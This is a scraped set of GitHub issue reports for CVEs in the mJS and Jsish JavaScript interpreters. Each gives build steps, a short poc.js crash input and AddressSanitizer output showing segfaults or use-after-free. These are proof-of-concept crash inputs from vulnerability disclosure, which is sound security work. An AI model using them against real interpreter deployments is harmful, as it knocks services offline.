Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via gc_compact_strings at src/mjs_gc.c. This vulnerability can lead to a Denial of Service (DoS).

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**

(function () {
    ((function f(a) {
        if (a \> 0) {
            if ('#1.1: -0 - -0 === 0. Actual: '((JSON.stringify(gc('#1.1: -0 - -0 === 0. Ac\\ual: '))) !== (gc('#1.1: -0 - -0 === 0. Actual: '))('#1.1: -0 - -0 === 0. Actual: ' !== f(a \- 1)))) {
                f(a \- 1)
            }
        }
    })(6))
})()

**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==50070==ERROR: AddressSanitizer: SEGV on unknown address 0x3a60d0000001 (pc 0x5588da606950 bp 0x615000000080 sp 0x7ffef6409930 T0)
==50070==The signal is caused by a READ memory access.
    #0 0x5588da60694f in gc\_compact\_strings src/mjs\_gc.c:406
    #1 0x5588da6087d7 in mjs\_gc src/mjs\_gc.c:500
    #2 0x5588da608ec2 in maybe\_gc src/mjs\_gc.c:446
    #3 0x5588da5d2d67 in mjs\_execute src/mjs\_exec.c:578
    #4 0x5588da5e0a05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #5 0x5588da5e0a05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #6 0x5588da59d909 in main src/mjs\_main.c:47
    #7 0x7fe819cbcb96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #8 0x5588da59e449 in \_start (/usr/local/bin/mjs+0xe449)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_gc.c:406 in gc\_compact\_strings
==50070==ABORTING

Credits: Found by OWL337 team.

CVE-2021-46538: SEGV src/mjs_gc.c:406 in gc_compact_strings · Issue #216 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x9a30e. This vulnerability can lead to a Denial of Service (DoS).

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    function Aply() {
        return Object.create.apply({}, [Object]);
    }
    function JSEtest(i) {
        return Aply(i, 1, 2, 3);
    }
    JSEtest(89)[Object.create--]
    JSEtest(0.2)
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js

ASAN:DEADLYSIGNAL
=================================================================
==87532==ERROR: AddressSanitizer: SEGV on unknown address 0x55d1329c929c (pc 0x55d1329c930f bp 0x615000000080 sp 0x7ffe4957a058 T0)
==87532==The signal is caused by a WRITE memory access.
    #0 0x55d1329c930e  (/usr/local/bin/mjs+0x9a30e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0x9a30e)
==87532==ABORTING

CVE-2021-46537: SEGV (/usr/local/bin/mjs+0x9a30e) · Issue #212 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0xe533e. This vulnerability can lead to a Denial of Service (DoS).

**mJS revision**

Commit: b1b6eac

Version:

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    isNaN(--isNaN) !== true
    
    if (isNaN(-function () { return 1 }) !== true) {
        $ERROR('#Error' + (-function () { return 1 }));
    }
**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==36318==ERROR: AddressSanitizer: SEGV on unknown address 0x559b7cd412cc (pc 0x559b7cd4133f bp 0x000000000043 sp 0x7fff0319d2b8 T0)
==36318==The signal is caused by a WRITE memory access.
    #0 0x559b7cd4133e  (/usr/local/bin/mjs+0xe533e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0xe533e)
==36318==ABORTING

Credits: Found by OWL337 team.

CVE-2021-46535: SEGV (/usr/local/bin/mjs+0xe533e) · Issue #209 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via free_json_frame at src/mjs_json.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((JSON.stringify-6.34321e2)(JSON.stringify([1, 2, 3])));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
\> $ Gmjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
======ERROR: AddressSanitizer: SEGV on unknown address 0x561b4e461e9c (pc 0x561b4e461ed5 bp 0x000000000080 sp 0x7ffdacf6fb18 T0)
======The signal is caused by a WRITE memory access.
    #0 0x561b4e461ed4 in free\_json\_frame src/mjs\_json.c:323
    #1 0x561b4e461ed4 in mjs\_json\_parse src/mjs\_json.c:476
    #2 0x7ffdacf6fc0f  (<unknown module>)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_json.c:323 in free\_json\_frame
======ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46550: SEGV src/mjs_json.c:323 in free_json_frame · Issue #230 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_set_internal at src/mjs_object.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((load - 6. + 4321e2)([([JSON.parse(JSON.stringify([(0)]))])]));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==51917==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffffffff81 (pc 0x5576b72e39f0 bp 0x000000000081 sp 0x7ffd4baed160 T0)
==51917==The signal is caused by a READ memory access.
    #0 0x5576b72e39ef in mjs\_set\_internal src/mjs\_object.c:207
    #1 0x5576b72e39ef in mjs\_set\_v src/mjs\_object.c:155

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_object.c:207 in mjs\_set\_internal
==51917==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46553: SEGV src/mjs_object.c:207 in mjs_set_internal · Issue #226 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_bcode_insert_offset at src/mjs_bcode.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((load - 6.34 * 21e2)([([JSON.parse(JSON.stringify([(0)]))])]));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==88306==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000008c (pc 0x558644d0edbc bp 0x000000000084 sp 0x7fffa37031f8 T0)
==88306==The signal is caused by a READ memory access.
==88306==Hint: address points to the zero page.
    #0 0x558644d0edbb in mjs\_bcode\_insert\_offset src/mjs\_bcode.c:67
    #1 0x7fffa3703a0f  (<unknown module>)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_bcode.c:67 in mjs\_bcode\_insert\_offset
==88306==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46556: SEGV src/mjs_bcode.c:67 in mjs_bcode_insert_offset · Issue #227 · cesanta/mjs

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via NumberConstructor at src/jsiNumber.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 2 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var list \= \[
    'aa',
    'hh'
\];
Number.bind(2, 4)();

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
=====ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55d872876fd3 bp 0x7ffd8a3d6b10 sp 0x7ffd8a3d6240 T0)
=====The signal is caused by a READ memory access.
=====Hint: address points to the zero page.
    #0 0x55d872876fd2 in NumberConstructor src/jsiNumber.c:93
    #1 0x55d87284a818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x55d8727c7fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x55d8727c7fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x55d872843ad6 in jsi\_FuncBindCall src/jsiProto.c:299
    #5 0x55d87284a818 in jsi\_FuncCallSub src/jsiProto.c:244
    #6 0x55d872b1471a in jsiFunctionSubCall src/jsiEval.c:796
    #7 0x55d872b1471a in jsiEvalFunction src/jsiEval.c:837
    #8 0x55d872b1471a in jsiEvalCodeSub src/jsiEval.c:1264
    #9 0x55d872b2815e in jsi\_evalcode src/jsiEval.c:2204
    #10 0x55d872b2c274 in jsi\_evalStrFile src/jsiEval.c:2665
    #11 0x55d87281b66a in Jsi\_Main src/jsiInterp.c:936
    #12 0x55d87302003a in jsi\_main src/main.c:47
    #13 0x7fb276e6fbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #14 0x55d8727af969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiNumber.c:93 in NumberConstructor

Credits: Found by OWL337 team.

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may have a correlation with #66, but I'm not for sure. Report this issue to assist your debug.

![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=88&v=4)

FIxed by fix for issue #66

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46490: SEGV src/jsiNumber.c:93 in NumberConstructor · Issue #67 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via jsi_ArrayConcatCmd at src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var i \= 0;

function JSEtest()
{
  arr\[arr\[1000\] \= 3\] \= 3;
  i++;
}

var arr \= new Array(10);
arr\[2\] \= 2;
arr.concat(JSEtest);

(arr.reduceRight(arr.concat), 0, '1');

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
==121369==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x563e6997e690 bp 0x00000000000a sp 0x7ffcb3c19980 T0)
==121369==The signal is caused by a READ memory access.
==121369==Hint: address points to the zero page.
    #0 0x563e6997e68f in jsi\_ArrayConcatCmd src/jsiArray.c:311
    #1 0x563e69943818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x563e698c0fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x563e698c0fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x563e69985851 in jsi\_ArrayReduceSubCmd src/jsiArray.c:641
    #5 0x563e69985851 in jsi\_ArrayReduceRightCmd src/jsiArray.c:672
    #6 0x563e69943818 in jsi\_FuncCallSub src/jsiProto.c:244
    #7 0x563e69c0d71a in jsiFunctionSubCall src/jsiEval.c:796
    #8 0x563e69c0d71a in jsiEvalFunction src/jsiEval.c:837
    #9 0x563e69c0d71a in jsiEvalCodeSub src/jsiEval.c:1264
    #10 0x563e69c2115e in jsi\_evalcode src/jsiEval.c:2204
    #11 0x563e69c25274 in jsi\_evalStrFile src/jsiEval.c:2665
    #12 0x563e6991466a in Jsi\_Main src/jsiInterp.c:936
    #13 0x563e6a11903a in jsi\_main src/main.c:47
    #14 0x7fde1e7babf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #15 0x563e698a8969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiArray.c:311 in jsi\_ArrayConcatCmd

Credits: Found by OWL337 team.

CVE-2021-46488: SEGV src/jsiArray.c:311 in jsi_ArrayConcatCmd · Issue #68 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ArgTypeCheck in src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 2 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= \[
  'aa',
  'gg',
  'hhh',
  'mm',
  'nn'
\];
'sort:' + JSEtest.sort(function (str, position) {
  return JSEtest.unshift('pop:' + JSEtest.pop());
});
!'concat:' + JSEtest.concat().every(function (E) {
  return 'sort:' + JSEtest.sort(function (str, position) {
    return JSEtest.unshift('pop:' + JSEtest.pop());
  });
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007458 at pc 0x5566730cf1ca bp 0x7ffe092500c0 sp 0x7ffe092500b0
READ of size 1 at 0x603000007458 thread T0
    #0 0x5566730cf1c9 in jsi\_ArgTypeCheck src/jsiFunc.c:207
    #1 0x556673158c49 in jsi\_FuncCallSub src/jsiProto.c:263
    #2 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #3 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #4 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #5 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x556673158834 in jsi\_FuncCallSub src/jsiProto.c:220
    #7 0x5566730d4fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #8 0x5566730d4fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #9 0x556673186fa8 in SortSubCmd src/jsiArray.c:970
    #10 0x7f067f973311  (/lib/x86\_64-linux-gnu/libc.so.6+0x42311)
    #11 0x7f067f9736b5 in qsort\_r (/lib/x86\_64-linux-gnu/libc.so.6+0x426b5)
    #12 0x55667318a611 in jsi\_ArraySortCmd src/jsiArray.c:1065
    #13 0x556673157818 in jsi\_FuncCallSub src/jsiProto.c:244
    #14 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #15 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #16 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #17 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #18 0x556673158834 in jsi\_FuncCallSub src/jsiProto.c:220
    #19 0x5566730d4fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #20 0x5566730d4fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #21 0x55667319bf64 in jsi\_ArrayFindSubCmd src/jsiArray.c:576
    #22 0x55667319bf64 in jsi\_ArrayEveryCmd src/jsiArray.c:663
    #23 0x556673157818 in jsi\_FuncCallSub src/jsiProto.c:244
    #24 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #25 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #26 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #27 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #28 0x556673439274 in jsi\_evalStrFile src/jsiEval.c:2665
    #29 0x55667312866a in Jsi\_Main src/jsiInterp.c:936
    #30 0x55667392d03a in jsi\_main src/main.c:47
    #31 0x7f067f952bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #32 0x5566730bc969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000007458 is located 8 bytes inside of 32-byte region \[0x603000007450,0x603000007470)
freed by thread T0 here:
    #0 0x7f06805c17a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x5566730dd6cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f06805c1d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55667312daa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiFunc.c:207 in jsi\_ArgTypeCheck
Shadow bytes around the buggy address:
  0x0c067fff8e30: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8e40: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8e50: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8e60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8e70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
\=>0x0c067fff8e80: fd fd fa fa fd fd fd fd fa fa fd\[fd\]fd fd fa fa
  0x0c067fff8e90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8ea0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8eb0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8ec0: fd fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
  0x0c067fff8ed0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may be related to #74 & #80, especially the POC, but I'm not for sure. Report this issue to assist your debug.

![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=88&v=4)

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46500: Heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck · Issue #85 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_wswebsocketObjFree in src/jsiWebSocket.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

console.printf\= (new WebSocket);
setTimeout(console, 100000);

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x61b000000080 at pc 0x55b167ed6de6 bp 0x7ffcd360f220 sp 0x7ffcd360f210
READ of size 4 at 0x61b000000080 thread T0
    #0 0x55b167ed6de5 in jsi\_wswebsocketObjFree src/jsiWebSocket.c:3190
    #1 0x55b167e7ba2d in jsi\_UserObjFree src/jsiUserObj.c:75
    #2 0x55b167dfeefb in Jsi\_ObjFree src/jsiObj.c:334
    #3 0x55b167dffa0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #4 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
    #5 0x55b167cae3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #6 0x55b167cae6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #7 0x55b167dfc697 in DeleteTreeValue src/jsiObj.c:177
    #8 0x55b167e14384 in Jsi\_TreeEntryDelete src/jsiTree.c:636
    #9 0x55b167e15f10 in destroy\_node src/jsiTree.c:496
    #10 0x55b167e15f10 in destroy\_node src/jsiTree.c:494
    #11 0x55b167e15f10 in Jsi\_TreeDelete src/jsiTree.c:515
    #12 0x55b167dfe9df in Jsi\_ObjFree src/jsiObj.c:348
    #13 0x55b167dffa0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #14 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
    #15 0x55b167cae3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #16 0x55b167cae6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #17 0x55b167dbe4d4 in Jsi\_EventFree src/jsiCmds.c:204
    #18 0x55b167cd44e2 in freeEventTbl src/jsiInterp.c:570
    #19 0x55b167d768dd in Jsi\_HashClear src/jsiHash.c:507
    #20 0x55b167d76cd7 in Jsi\_HashDelete src/jsiHash.c:526
    #21 0x55b167ce787c in jsiInterpDelete src/jsiInterp.c:1936
    #22 0x55b1684fe047 in jsi\_main src/main.c:49
    #23 0x7f5c2d555bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #24 0x55b167c8d969 in \_start (/usr/local/bin/jsish+0xe8969)

0x61b000000080 is located 0 bytes inside of 1656-byte region \[0x61b000000080,0x61b0000006f8)
freed by thread T0 here:
    #0 0x7f5c2e1c47a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x55b167ed6d22 in jsi\_wswebsocketObjFree src/jsiWebSocket.c:3199

previously allocated by thread T0 here:
    #0 0x7f5c2e1c4d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55b167cfeaa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiWebSocket.c:3190 in jsi\_wswebsocketObjFree
Shadow bytes around the buggy address:
  0x0c367fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c367fff8010:\[fd\]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

Tag

#ubuntu